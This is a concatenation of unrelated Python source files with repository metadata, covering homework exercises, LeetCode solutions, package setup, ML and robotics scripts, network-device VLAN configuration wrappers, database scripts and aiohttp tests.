goal_word and guess are assumed to be of the same length.
goal_word and guess are both instances of the word ADT.
>>> mwfs, mwfl = make_word_from_string, make_word_from_list
>>> num_common_letters(mwfs('steal'), mwfs('least'))
5
>>> num_common_letters(mwfs('steal'), mwfl(['s', 't', 'e', 'e', 'l']))
4
>>> num_common_letters(mwfl(['s', 't', 'e', 'a', 'l']), mwfs('thief'))
2
>>> num_common_letters(mwfl(['c', 'a', 'r']), mwfl(['p', 'e', 't']))
0
"""
"*** YOUR CODE HERE ***"
repeat=[]
count=0
for item in get_list(goal_word):
if item in get_list(guess) and item not in repeat:
repeat.append(item)
count+=1
return count
| [
"rrc@berkeley.edu"
] | rrc@berkeley.edu |
75f83ebc463692cc3311e47af2d58ab9bb6ec09a | 3e63befd66d0f8fddaba4ce8c1ed73525c32a5aa | /venv/Lib/site-packages/mediapipe/__init__.py | 18313dee95ea374467c4c87e1029b3bee7e266c5 | [
"MIT"
] | permissive | tanvirtareq/awesome-hand-gesture-detection | b0ecc6636e810412950b705e6ef5c1d83099b547 | ccc836557b730cf34861301712de0de3eec1076d | refs/heads/main | 2023-06-04T02:24:34.452783 | 2021-06-18T11:36:39 | 2021-06-18T11:36:39 | 389,102,297 | 1 | 0 | MIT | 2021-07-24T13:10:45 | 2021-07-24T13:10:45 | null | UTF-8 | Python | false | false | 657 | py | """Copyright 2019 - 2020 The MediaPipe Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from mediapipe.python import *
import mediapipe.python.solutions as solutions
| [
"airriaislam@gmail.com"
] | airriaislam@gmail.com |
284051124955cde290278a36bb4281c6ec7b0c1f | 0dc70961312cfc88e8156a1a5043b3096b377d47 | /leetcode1/isSymmetric.py | 4edb5be3b8fde87912cc8d29e492e3fa6105f74a | [] | no_license | lizyang95/leetcode | 881217bf446caa533c5dbc98638db85e2831fc8b | 16e8a7935811fa71ce71998da8549e29ba68f847 | refs/heads/master | 2020-03-21T11:43:05.910036 | 2018-09-28T15:25:42 | 2018-09-28T15:25:42 | 138,518,698 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,427 | py | # Definition for a binary tree node.
import collections
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def isSymmetric(self, root):
"""
:type root: TreeNode
:rtype: int
"""
if not root:
return True
queue = collections.deque([root])
queue.append(root)
while queue:
t1 = queue.popleft()
t2 = queue.popleft()
if not t1 and not t2:
continue
if not t1 or not t2:
return False
if t1.val != t2.val:
return False
queue.append(t1.left)
queue.append(t2.right)
queue.append(t1.right)
queue.append(t2.left)
return True
class recursiveSolution(object):
def isSymmetric(self,root):
return self.isMirror(root,root)
def isMirror(self,root1,root2):
if not root1 and not root2:
return True
if not root1 or not root2:
return False
return root1.val == root2.val and self.isMirror(root1.right,root2.left) and self.isMirror(root1.left,root2.right)
def main():
sol = Solution()
root = TreeNode(2)
root.left = TreeNode(1)
root.right = TreeNode(3)
print(sol.isSymmetric(root))
if __name__ == '__main__':
main()
| [
"yy4@cs.cmu.edu"
] | yy4@cs.cmu.edu |
01b0330ecaa897757aec3ba087c86a68c68d4467 | ddf52813dc439eb931f642f6538fce97e0bacc2e | /setup.py | de41cc2b1a56a4e8a28253be5e785c27e25521f7 | [] | no_license | akashadhikari/SpellNepaliNumber | 935a82b1050be333a3a96c096a6f2bdc5799397b | 04334d5b9f51a4c4a47c3a9600c8e966c58b8393 | refs/heads/master | 2020-04-01T06:06:39.644612 | 2018-10-08T10:14:28 | 2018-10-08T10:14:28 | 152,933,566 | 1 | 0 | null | 2018-10-14T02:50:44 | 2018-10-14T02:50:43 | null | UTF-8 | Python | false | false | 922 | py | try:
from setuptools import setup
except ImportError:
from distutils.core import setup
# requirements = [pkg.split('=')[0] for pkg in open('requirements.txt').readlines()]
# description = "Commandline tool to listen all radio stations of Nepal"
# long_description = open("README.rst").read()
classifiers = ['Environment :: Console',
'Programming Language :: Python :: 3'
]
# version = open('CHANGES.txt').readlines()[0][1:].strip()
setup(
name='SpellNepaliNumber',
version='1.2.1',
description="To Spell Out Nepali Numbers In Nepali Language.",
author='Shital Babu Luitel',
author_email='ctalluitel@gmail.com',
url='https://github.com/shitalluitel/SpellNepaliNumber',
scripts=['src/spellnepalinumber'],
# install_requires=requirements,
packages=['SpellNepaliNumber'],
package_dir = {'SpellNepaliNumber': 'src/SpellNepaliNumber'},
classifiers=classifiers
) | [
"ctalluitel@gmail.com"
] | ctalluitel@gmail.com |
7794e801dd2dc341cf577b374cbd03d0a07ea2ff | 502e97f0ec4f287b8280a546e7f2555ff3a5a1fd | /cnn_3d/main_allSamples.py | d27a1c9f9b73ba49a68d001d76d793350b92d210 | [] | no_license | carlasailer/cnn_ct_pet | d350692be03432e025e33db6296ac33b36bedf08 | 4e256bb73f7ea0ab046c231762001b9f3535bb00 | refs/heads/master | 2020-12-18T23:11:24.048337 | 2020-01-22T10:40:52 | 2020-01-22T10:40:52 | 235,549,036 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,968 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 4 11:02:35 2018
@author: s1287
"""
import os
import time
import datetime
from scripts_CNN.model_creation import Model_Li1
#from scripts_CNN.data_creation import Dataset
from scripts_CNN.data_creation_meddata import Dataset_MedData
from scripts_CNN.model_training import Trainer
from scripts_CNN.model_evaluation import Evaluator
from scripts_CNN.saver import Saver
def getCNNModel(config, data):
if config["model"] == 'Li1':
cnn_model = Model_Li1(config=config, data=data)
return cnn_model
def run_main(config):
##### FILE FOR A SINGLE DATASET FOR FIRST TESTING
###### processing
#start the timer
start_time = time.time()
#%% create data
#data = Dataset(config)
data = Dataset_MedData(config=config)
#%% create model
cnn_model = getCNNModel(config=config, data=data)
#%% create a results folder
time_stamp = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M')
save_folder = os.path.join('/home/s1287/no_backup/s1287/CNN_PET_Prediction_Results/VoxelPatch/',
str(time_stamp + '_' + config["model"]))
#%% train model
trainer = Trainer(config=config, model=cnn_model.model, data=data, save_folder=save_folder)
##%% evaluate model
evaluator = Evaluator(config=config, model=trainer.training_model, data=data, history=trainer.history,
save_folder=trainer.save_folder, training_ssim=trainer.metrics_callback.get_ssim())
#%% save
Saver(config=config, model=evaluator.evaluation_model, data=data, evaluator=evaluator,
metrics=evaluator.metrics, trainer=trainer, training_ssim=trainer.metrics_callback.get_ssim())
del cnn_model
#stop the timer
elapsed_time = time.time() - start_time
print('Reached end of program after: ', time.strftime("%H:%M:%S", time.gmtime(elapsed_time)) )
| [
"40063163+carlasailer@users.noreply.github.com"
] | 40063163+carlasailer@users.noreply.github.com |
5d94ee32d2f13dd3088229a40508eabfef487aa3 | 9dcac6f93c2e460009e3355976989adf3bf1af68 | /NextMeeting.py | be0c2848228955655f87d1e815c05ba202d6f2b8 | [] | no_license | lpham4/PythonPractice | 99a4db621a6e524b2264314f1d4d47e2474260f9 | fac0931d09441ad03c4b34abae01f928342d53d7 | refs/heads/main | 2023-01-02T11:56:39.192524 | 2020-10-21T23:45:52 | 2020-10-21T23:45:52 | 306,173,850 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 988 | py | # Class: 1321L
# Section: 02
# Term: Fall 2018
# Instructor: Professor Malcolm
# Name: Ly Pham
# Lab: Python
day = int(input("Enter today's day: "))
days = int(input('Enter days until meeting: '))
if day == 0:
print('Today is Sunday')
elif day == 1:
print('Today is Monday')
elif day == 2:
print('Today is Tuesday')
elif day == 3:
print('Today is Wednesday')
elif day == 4:
print('Today is Thursday')
elif day == 5:
print('Today is Friday')
elif day == 6:
print('Today is Saturday')
print('Days to the meeting is', days, 'days')
meeting = (day + days) % 7
if meeting == 0:
print('Meeting day is Sunday')
elif meeting == 1:
print('Meeting day is Monday')
elif meeting == 2:
print('Meeting day is Tuesday')
elif meeting == 3:
print('Meeting day is Wednesday')
elif meeting == 4:
print('Meeting day is Thursday')
elif meeting == 5:
print('Meeting day is Friday')
elif meeting == 6:
print('Meeting day is Saturday')
| [
"lpham4@students.kennesaw.edu"
] | lpham4@students.kennesaw.edu |
d084a33ec6dda9c755028bb84f0fd326b9c56b6d | beb0cbbfc6b910c6eedafc6b6e986e2b48cb260a | /cloudshell/networking/cisco/iosxr/command_actions/add_remove_vlan.py | cebc6d3a1288dc67fdf2c50377733eb2cd76de3c | [] | no_license | QualiSystems/cloudshell-networking-cisco-iosxr | 31a464608c9a382166e6828d6fae34cda75edd44 | cc7a12808a3d6146c7277d1c69b8fddd10010ec7 | refs/heads/master | 2023-05-06T23:54:00.527717 | 2023-04-26T00:47:14 | 2023-04-26T00:47:14 | 347,954,857 | 0 | 0 | null | 2023-04-26T00:47:15 | 2021-03-15T12:10:39 | Python | UTF-8 | Python | false | false | 2,038 | py | from cloudshell.cli.command_template.command_template_executor import (
CommandTemplateExecutor,
)
from cloudshell.networking.cisco.command_actions.add_remove_vlan_actions import (
AddRemoveVlanActions,
)
from cloudshell.networking.cisco.command_templates import (
add_remove_vlan as vlan_command_template,
)
from cloudshell.networking.cisco.command_templates import (
iface as iface_command_template,
)
class CiscoIOSXRAddRemoveVlanActions(AddRemoveVlanActions):
def set_vlan_to_interface(
self,
vlan_range,
port_mode,
port_name,
qnq,
c_tag,
action_map=None,
error_map=None,
):
"""Assign VLAM to a certain interface.
:param vlan_range: range of vlans to be assigned
:param port_mode: switchport mode
:param port_name: interface name
:param qnq: qinq settings (dot1q tunnel)
:param c_tag: selective qnq
:param action_map: actions will be taken during executing commands
:param error_map: errors will be raised during executing commands
"""
CommandTemplateExecutor(
self._cli_service, iface_command_template.CONFIGURE_INTERFACE
).execute_command(port_name=port_name, l2transport="")
CommandTemplateExecutor(
self._cli_service,
iface_command_template.NO_SHUTDOWN,
action_map=action_map,
error_map=error_map,
).execute_command()
if qnq:
CommandTemplateExecutor(
self._cli_service,
vlan_command_template.VLAN_SUB_IFACE,
action_map=action_map,
error_map=error_map,
).execute_command(vlan_id=vlan_range, qnq="")
else:
CommandTemplateExecutor(
self._cli_service,
vlan_command_template.VLAN_SUB_IFACE,
action_map=action_map,
error_map=error_map,
).execute_command(vlan_id=vlan_range, untagged="")
| [
"anton.p@qualisystems.com"
] | anton.p@qualisystems.com |
1811bfd210cdbdc3d327ce32a5ca4946b3cc3247 | 50008b3b7fb7e14f793e92f5b27bf302112a3cb4 | /recipes/Python/131495_lazy_attributes/recipe-131495.py | 874a7af85b7f5574564b52b2f09ea5755b13849d | [
"Python-2.0",
"MIT"
] | permissive | betty29/code-1 | db56807e19ac9cfe711b41d475a322c168cfdca6 | d097ca0ad6a6aee2180d32dce6a3322621f655fd | refs/heads/master | 2023-03-14T08:15:47.492844 | 2021-02-24T15:39:59 | 2021-02-24T15:39:59 | 341,878,663 | 0 | 0 | MIT | 2021-02-24T15:40:00 | 2021-02-24T11:31:15 | Python | UTF-8 | Python | false | false | 1,432 | py | #
# first solution:
#
class sample(object):
class one(object):
def __get__(self, obj, type=None):
print "computing ..."
obj.one = 1
return 1
one = one()
x=sample()
print x.one
print x.one
#
# other solution:
#
# lazy attribute descriptor
class lazyattr(object):
def __init__(self, fget, doc=''):
self.fget = fget
self.__doc__ = doc
def __appoint__(self, name, cl_name):
if hasattr(self,"name"):
raise SyntaxError, "conflict between "+name+" and "+self.name
self.name = name
def __get__(self, obj, cl=None):
if obj is None:
return self
value = self.fget(obj)
setattr(obj, self.name, value)
return value
# appointer metaclass:
# call the members __appoint__ method
class appointer(type):
def __init__(self, cl_name, bases, namespace):
for name,obj in namespace.iteritems():
try:
obj.__appoint__(name, cl_name)
except AttributeError:
pass
super(appointer, self).__init__(cl_name, bases, namespace)
# base class for lazyattr users
class lazyuser(object):
__metaclass__ = appointer
# usage sample
class sample(lazyuser):
def one(self):
print "computing ..."
return 1
one = lazyattr(one, "one lazyattr")
x=sample()
print x.one
print x.one
del x.one
print x.one
| [
"betty@qburst.com"
] | betty@qburst.com |
57581e21464b436ecef0539ec631f309d19d2e4a | 1a949f20cafe328c5ad145659903e8dc5d974a76 | /pages/urls.py | 44251d6aa86a15c40c48679c4545fe1989989b61 | [] | no_license | Fabricourt/plotx | 7154be9153ab532796a16a1de3125276913fca97 | b2a526d4a9236217978a48a997b3b425cd40c0a9 | refs/heads/master | 2022-12-11T18:57:36.631087 | 2020-07-07T17:22:50 | 2020-07-07T17:22:50 | 230,000,109 | 0 | 1 | null | 2022-12-08T03:27:54 | 2019-12-24T20:25:39 | JavaScript | UTF-8 | Python | false | false | 515 | py | from django.urls import path
from django.views.generic import RedirectView
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('about', views.about, name='about'),
path('homework', views.homework, name='homework'),
path('gallery', views.gallery, name='gallery'),
path('mobile', views.mobile, name='mobile'),
path('tablet', views.tablet, name='tablet'),
path('laptop', views.laptop, name='laptop'),
path('dashboard', views.Dashboard, name='dashboard'),
] | [
"mfalme2030@gmail.com"
] | mfalme2030@gmail.com |
c56cffdde03bab85092fdc019d0e6bff748a33d7 | 41523dd4871e8ed1043d2b3ddf73417fcbdde209 | /mysqldemo/创建表.py | 7062a2f4c4027ad264a212153fdf7e2a85d24ed8 | [] | no_license | WayneChen1994/Python1805 | 2aa1c611f8902b8373b8c9a4e06354c25f8826d6 | a168cd3b7749afc326ec4326db413378fd3677d5 | refs/heads/master | 2020-03-30T23:19:00.773288 | 2018-11-02T10:47:40 | 2018-11-02T10:47:40 | 151,697,105 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 381 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# author:Wayne
import pymysql
db = pymysql.connect("127.0.0.1", "root", "0831", "studb")
cursor = db.cursor()
sql = "create table teacher(" \
"id int not null auto_increment primary key," \
"name varchar(20) not null," \
"age int not null)"
cursor.execute(sql)
res = cursor.fetchone()
print(res)
db.close()
| [
"waynechen1994@163.com"
] | waynechen1994@163.com |
e2b116150dae39a52c16e8b225e000bc2dc8f3b4 | fdedfbc1290016ae293edcc41df96d0a3fb8a99c | /code_backup/import_test.py | 394e1b10f06e2e12afa69c34918b7f0bc8fe5a69 | [] | no_license | Hsingmin/machine-learning | 5d798ff974429fccb84ad61b2f72f4bb375c80e3 | a554d9c2324b5daf0dde4c78f4a9b6e6b630e413 | refs/heads/master | 2021-01-23T18:47:51.153195 | 2018-06-14T14:48:09 | 2018-06-14T14:48:09 | 102,808,183 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 218 | py | #coding:utf-8
import ocr.keys as keys
extern = 'extern massage...'
def show_keys():
print('__ import keys in same package __')
characters = keys.alphabet[:]
print(characters[0:100])
print(extern)
| [
"alfred_bit@sina.cn"
] | alfred_bit@sina.cn |
4efe234a9da2c91c8a2c5dbc01f699b952539852 | 2e1a1d6d4ffe9da205413cbd395beb98b84369a3 | /run_benchmark.py | 50ac0f3b2519575b788eb1483b5c9b322199dd77 | [] | permissive | BertrandBordage/django-tree | 068838cb604a47d705941813c291fa25094e4238 | ee8f9bbdb7dbe7d78a5b5c2d3174cc9c3d166171 | refs/heads/master | 2023-07-09T23:24:51.401239 | 2023-07-09T14:08:02 | 2023-07-09T14:08:02 | 52,733,318 | 84 | 11 | BSD-3-Clause | 2022-06-21T21:09:17 | 2016-02-28T17:22:19 | Python | UTF-8 | Python | false | false | 699 | py | #!/usr/bin/env python
import argparse
import os
import django
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--run-django-tree-only', action='store_true')
parser.add_argument('--db-optimization-interval', type=int, default=100)
parser.add_argument('selected_tests', nargs='*', type=str)
args = parser.parse_args()
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'benchmark.settings')
django.setup()
from benchmark.base import Benchmark
Benchmark(
run_django_tree_only=args.run_django_tree_only,
db_optimization_interval=args.db_optimization_interval,
selected_tests=args.selected_tests,
).run()
| [
"bordage.bertrand@gmail.com"
] | bordage.bertrand@gmail.com |
5e2045a72218448c42c0388df9e8a06f6034e419 | a998fa930f5483fdef4770ff4c9fa6edcbbf159c | /01_sample_search_and_return/05_decision_to_go.py | f381c800e801be121fd6986c7df02981afa03f54 | [] | no_license | lmquan1609/robot | dde9cc86d61b0ff88397bb490423932acc8b94e7 | 927d4d387fc1734b11147f0caf8a768fa5fb6093 | refs/heads/master | 2020-12-02T00:33:17.800436 | 2019-12-31T09:48:07 | 2019-12-31T09:48:07 | 230,830,545 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,226 | py | import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import numpy as np
import cv2
from decision_extra_functions import *
# Define a function to convert from cartesian to polar coordinates
def to_polar_coords(xpix, ypix):
# Calculate distance to each pixel
dist = np.sqrt(xpix ** 2 + ypix ** 2)
angles = np.arctan2(ypix, xpix)
return dist, angles
image = mpimg.imread('angle_example.jpg')
warped = perspect_transform(image)
colorsel = color_thresh(warped, rgb_thresh=(160, 160, 160))
xpix, ypix = rover_coords(colorsel)
distances, angles = to_polar_coords(xpix, ypix)
avg_angle = angles.mean()
# Do some plotting
fig = plt.figure(figsize=(12,9))
plt.subplot(221)
plt.imshow(image)
plt.subplot(222)
plt.imshow(warped)
plt.subplot(223)
plt.imshow(colorsel, cmap='gray')
plt.subplot(224)
plt.plot(xpix, ypix, '.')
plt.ylim(-160, 160)
plt.xlim(0, 160)
arrow_length = 100
x_arrow = arrow_length * np.cos(avg_angle)
y_arrow = arrow_length * np.sin(avg_angle)
plt.arrow(0, 0, x_arrow, y_arrow, color='red', zorder=2, head_width=10, width=2)
plt.show()
avg_angle_degrees = avg_angle * 180/np.pi
steering = np.clip(avg_angle_degrees, -15, 15)
print(f'Steering at {steering}, with {avg_angle_degrees}') | [
"ITITIU15033@student.hcmiu.edu.vn"
] | ITITIU15033@student.hcmiu.edu.vn |
d1900ff21a19661ac3e69e12f66c9c60ad141073 | c838b6a37a7499e184bb892cd40f2f1fbb79002d | /Livro Python/CursoPython/progs/p018_funcoes_pre_definidas.py | a59c499ce4fec27ecd469eb002ad4ca22052a29c | [] | no_license | danbailo/Python | f2920dd420a9ead29e6f38b64f0b38af0d1b5dbf | 3e3113d26bf9aee39e1ab4a3b2881c4c328143f3 | refs/heads/master | 2021-07-24T02:13:41.612337 | 2020-05-14T22:58:32 | 2020-05-14T22:58:32 | 169,300,125 | 1 | 1 | null | 2019-09-03T15:20:29 | 2019-02-05T19:35:09 | Python | UTF-8 | Python | false | false | 837 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Jan 24 13:27:19 2019
@author: notebook
"""
#P018: funções pré-definidas
#funções numéricas
n1=100
n2=3.141592653
n3=9.99
print(abs(1000), abs(-500), abs(2 * -2.5), abs(0)) #1000 500 5.0 0
print(pow(n1,2)) #10000
print(round(n2,2)) #3.14
print(round(n2), round(n3)) #3 10
#funções de conversão
s1='5'
s2='9.99'
print(int(s1)) #converteu '5' -> 5
print(float(s2)) #converteu '9.99' -> 9.99
print('O valor de PI com 10 digitos é: ' + str(n2))
print('O valor de PI com 2 digitos é: ' + str(round(n2,2)))
#funções de string
s1='python'
s2='inconstitucional'
print(len(s1)) #6
print(len(s2)) #16
print(max(s1)) #'y'
print(min(s1)) #'h'
| [
"danbailoufms@gmail.com"
] | danbailoufms@gmail.com |
b00b867066a7fc05e9273233d2367e6c09c2f814 | 8698757521458c2061494258886e5d3cdfa6ff11 | /argo/core/plotComparisonsCurves-by-model.py | f1dfe25255275fc69e13974848d02a4467f90690 | [
"MIT"
] | permissive | ricvo/argo | 546c91e84d618c4bc1bb79a6bc7cba01dca56d57 | a10c33346803239db8a64c104db7f22ec4e05bef | refs/heads/master | 2023-02-25T01:45:26.412280 | 2020-07-05T22:55:35 | 2020-07-05T22:55:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,081 | py | import argparse
from argo.core.utils.PlotCurves import PlotCurves
parser = argparse.ArgumentParser(description='Plot curves from different txt log files to compare experiments', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('conf_file', help='The config file with the details of the experiments')
args = parser.parse_args()
argv = ["dummy", args.conf_file]
conf_file = eval(open(args.conf_file, 'r').read())
for stp in [0.1, 0.2, 0.3, 0.4]:
for zsc in [1.0, 2.0, 4.0]:
conf = conf_file.copy()
print(stp, zsc)
conf['where'] = [('stp', str(stp), 1)]
conf['block'] = [("zsc", "1.0", 4), ("zsc", "1.5", 4), ("zsc", "2.0", 4), ("zsc", "2.5", 4), ("zsc", "3.0", 4), ("zsc", "3.5", 4), ("zsc", "4.0", 4), ("zsc", "6.0", 4), ("zsc", "8.0", 4)]
conf['block'].remove(("zsc", str(zsc), 4))
conf['legend'] = [("rec", 1, "model "), ("d", 1, "denoising ")]
tag = 'various-models' + '_stp' + str(stp) + '_zsc' + str(zsc)
conf['tag'] = tag
pc = PlotCurves()
pc.plot(**conf)
| [
"volpi@rist.ro"
] | volpi@rist.ro |
e74e4c2c954fee237c5bcee61f390972ef165d37 | 880d9cc2704f7de649ad4455dd7ec2806b6a9e95 | /Day05/daffodils_number.py | c2baf5ed048155e457be87ab63511d532c27bf15 | [] | no_license | shunz/Python-100-Days_Practice | 14795757effcff50a4644f57c5c109fa1c9c38ac | 82f508ff6911ce3aa5c5a69cd481a6cc87f02258 | refs/heads/master | 2020-12-26T18:52:32.755384 | 2020-04-07T15:49:36 | 2020-04-07T15:49:36 | 237,604,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 319 | py | '''
找出所有水仙花数
Ver: 0.1
Auther: Shunz
'''
for num in range(1000,10000):
sd = single_digits = num % 10
td = ten_digits = num // 10 % 10
hd = hundred_digits = num // 100 % 10
thd = thunsand_digits = num // 1000
if num == sd ** 4 + td ** 4 + hd ** 4 + thd ** 4:
print(num)
| [
"rockucn@gmail.com"
] | rockucn@gmail.com |
31f06b0c3f001267f808fab05e9a9c1dd91fb836 | 60044c76b631e622edb28f3a74971ce06211fac5 | /Python-for-Everybody/Python-Network-Data/networked-programs/urlwords.py | a00af7d0edd395ad9d324c5bbac994006a77943e | [] | no_license | NestorMonroy/Courses-coursera | 8d45a858c79567d74f013ac27ac33d47e43abb96 | 98ac1aa5bb0cd9da5cea5be02995d5b65c779201 | refs/heads/master | 2023-08-14T13:36:07.348994 | 2021-09-22T06:13:57 | 2021-09-22T06:13:57 | 327,753,375 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 246 | py | import urllib.request as request
fhand = request.urlopen('http://data.pr4e.org/romeo.txt')
counts = {}
for line in fhand:
words = line.decode().split()
for word in words:
contador[word] = counts.get(word, 0) + 1
print(counts)
| [
"nestor.monroy.90@gmail.com"
] | nestor.monroy.90@gmail.com |
0ace7d7d527c28835ae59194c09c1d32648d05c1 | ecf0d106831b9e08578845674a457a166b6e0a14 | /OOP/EXAMS/aug_16_2020/project/software/software.py | 0c54a9287d2940f00a6ad5448f4e70e830ae1154 | [] | no_license | ivo-bass/SoftUni-Solutions | 015dad72cff917bb74caeeed5e23b4c5fdeeca75 | 75612d4bdb6f41b749e88f8d9c512d0e00712011 | refs/heads/master | 2023-05-09T23:21:40.922503 | 2021-05-27T19:42:03 | 2021-05-27T19:42:03 | 311,329,921 | 8 | 5 | null | null | null | null | UTF-8 | Python | false | false | 274 | py | class Software:
def __init__(self, name: str, type: str, capacity_consumption: int, memory_consumption: int):
self.name = name
self.type = type
self.capacity_consumption = capacity_consumption
self.memory_consumption = memory_consumption
| [
"ivailo.ignatoff@gmail.com"
] | ivailo.ignatoff@gmail.com |
50a595efd00708731c461b647a40b283b5ad46fa | 2420a09930fcc1a0d3c67a0791be70ddee418f4a | /House_Robber.py | 8efb6e183657f26dcceb82ff35a604d6ee75a55c | [] | no_license | Superbeet/LeetCode | eff8c2562fb5724b89bc2b05ab230a21b67a9e5a | a1b14fc7ecab09a838d70e0130ece27fb0fef7fd | refs/heads/master | 2020-04-06T03:34:10.973739 | 2018-02-13T00:57:06 | 2018-02-13T00:57:06 | 42,485,335 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,222 | py | class Solution(object):
def rob(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
size = len(nums)
if size==0:
return 0
if size==1:
return nums[0]
s = [0 for i in range(size)]
s[0] = nums[0]
s[1] = max(nums[0], nums[1])
for i in xrange(2, size):
s[i] = max(s[i-2]+nums[i], s[i-1])
return s[-1]
sol = Solution()
n = [1,1,1]
print sol.rob(n)
class Solution(object):
def rob(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
if not nums:
return 0
elif len(nums)==1:
return nums[0]
return max( self.do_rob(nums[1:]), self.do_rob(nums[:-1]) )
def do_rob(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
if len(nums)==1:
return nums[0]
size = len(nums)
dp = [0, 0]
dp[0] = nums[0]
dp[1] = max(nums[0],nums[1])
for i in xrange(2, size):
dp[i%2] = max(dp[(i-1)%2], dp[(i-2)%2] + nums[i])
return dp[(size-1)%2]
| [
"aslan.yeh2010@gmail.com"
] | aslan.yeh2010@gmail.com |
9667831ff9441ba8ecb65a87e049995c3bc1b423 | 52ad58b5412f9124822283d168391e5e2b8fa150 | /MySQL/day60/练习题(六)05.py | 7eaba43c215cf40936d0adc65577cd550d254437 | [] | no_license | JiangHuYiXiao/PythonStudy | 69ad9795faaf24a6166ab21cae564f6461e1363e | aeebce2cacbf3757d25c8c4d24d15639e0bb8e37 | refs/heads/master | 2021-08-17T16:54:43.477502 | 2021-08-11T01:06:11 | 2021-08-11T01:06:11 | 153,078,386 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,793 | py | # -*- coding:utf-8 -*-
# @Author : 江湖一笑
# @Time : 2019/12/6 8:24
# @Software : Python_study
# @Python_verison : 3.7
'''
-- 21、删除学习“李平”老师课的score表记录
DELETE from t_score score where score.score_course_id in(
select course.course_id from t_teacher teacher inner join t_course course on teacher.teacher_id=course.c_teacher_id where teacher.tname='李平老师');
-- 22、向SC表中插入一些记录,这些记录要求符合以下条件:①没有上过编号“002”课程的同学学号;②插入“002”号课程的平均成绩;
insert into t_score(score_student_id,score_course_id,score_number)
select score_student_id,4,(select avg(score_number) from t_score where score_course_id=2) from t_score score where score.score_course_id!=2 group by score_student_id;
-- 23、按平均成绩从低到高 显示所有学生的“生物”、“物理”、“体育”三门的课程成绩,按如下形式显示: 学生ID,生物,物理,体育,有效课程数,有效平均分
select score_student_id,
(select score_number from t_score as sw where score_course_id in(select course_id from t_course where course_name='生物') and sw.score_student_id= sc.score_student_id )as 生物成绩,
(select score_number from t_score as wl where score_course_id in(select course_id from t_course where course_name='物理') and wl.score_student_id= sc.score_student_id) as 物理成绩,
(select score_number from t_score as ty where score_course_id in(select course_id from t_course where course_name='体育') and ty.score_student_id= sc.score_student_id) as 体育成绩,
count(sc.score_course_id) as 有效课程数,
avg(sc.score_number) as 平均成绩
from t_score as sc group by sc.score_student_id order by 平均成绩;
''' | [
"1163270704@qq.com"
] | 1163270704@qq.com |
5c7b5be0c3377aee4f27e5cb4f47f95ad65c5291 | e03d98c557a8e71d4c55d5e67b6381188213cfc4 | /tests/test_async_aiohttp.py | b367c7948e4b45730fcf54804f8e2e86d3734436 | [
"MIT"
] | permissive | lericson/python-engineio | a0ab138d6535fc75b04df5ddb1f8dee057926fc9 | b8ac261440c8e55826f7743131e65c0d2e2d1dc8 | refs/heads/master | 2021-01-19T03:59:56.972405 | 2017-04-05T18:57:46 | 2017-04-05T18:57:46 | 87,345,583 | 0 | 0 | null | 2017-04-05T18:54:56 | 2017-04-05T18:54:56 | null | UTF-8 | Python | false | false | 2,262 | py | import sys
import unittest
import six
if six.PY3:
from unittest import mock
else:
import mock
if sys.version_info >= (3, 5):
from aiohttp import web
from engineio import async_aiohttp
@unittest.skipIf(sys.version_info < (3, 5), 'only for Python 3.5+')
class AiohttpTests(unittest.TestCase):
@mock.patch('aiohttp.web_urldispatcher.UrlDispatcher.add_route')
def test_create_route(self, add_route):
app = web.Application()
mock_server = mock.MagicMock()
async_aiohttp.create_route(app, mock_server, '/foo')
print(add_route.call_args_list)
add_route.assert_any_call('GET', '/foo', mock_server.handle_request,
name=None)
add_route.assert_any_call('POST', '/foo', mock_server.handle_request)
def test_translate_request(self):
request = mock.MagicMock()
request._message.method = 'PUT'
request._message.path = '/foo/bar?baz=1'
request._message.version = (1, 1)
request._message.headers = {'a': 'b', 'c-c': 'd', 'c_c': 'e',
'content-type': 'application/json',
'content-length': 123}
request._payload = b'hello world'
environ = async_aiohttp.translate_request(request)
expected_environ = {
'REQUEST_METHOD': 'PUT',
'PATH_INFO': '/foo/bar',
'QUERY_STRING': 'baz=1',
'CONTENT_TYPE': 'application/json',
'CONTENT_LENGTH': 123,
'HTTP_A': 'b',
# 'HTTP_C_C': 'd,e',
'RAW_URI': '/foo/bar?baz=1',
'SERVER_PROTOCOL': 'HTTP/1.1',
'wsgi.input': b'hello world',
'aiohttp.request': request,
}
for k, v in expected_environ.items():
self.assertEqual(v, environ[k])
self.assertTrue(
environ['HTTP_C_C'] == 'd,e' or environ['HTTP_C_C'] == 'e,d')
@mock.patch('engineio.async_aiohttp.aiohttp.web.Response')
def test_make_response(self, Response):
async_aiohttp.make_response('202 ACCEPTED', 'headers', 'payload')
Response.assert_called_once_with(body='payload', status=202,
headers='headers')
| [
"miguel.grinberg@gmail.com"
] | miguel.grinberg@gmail.com |
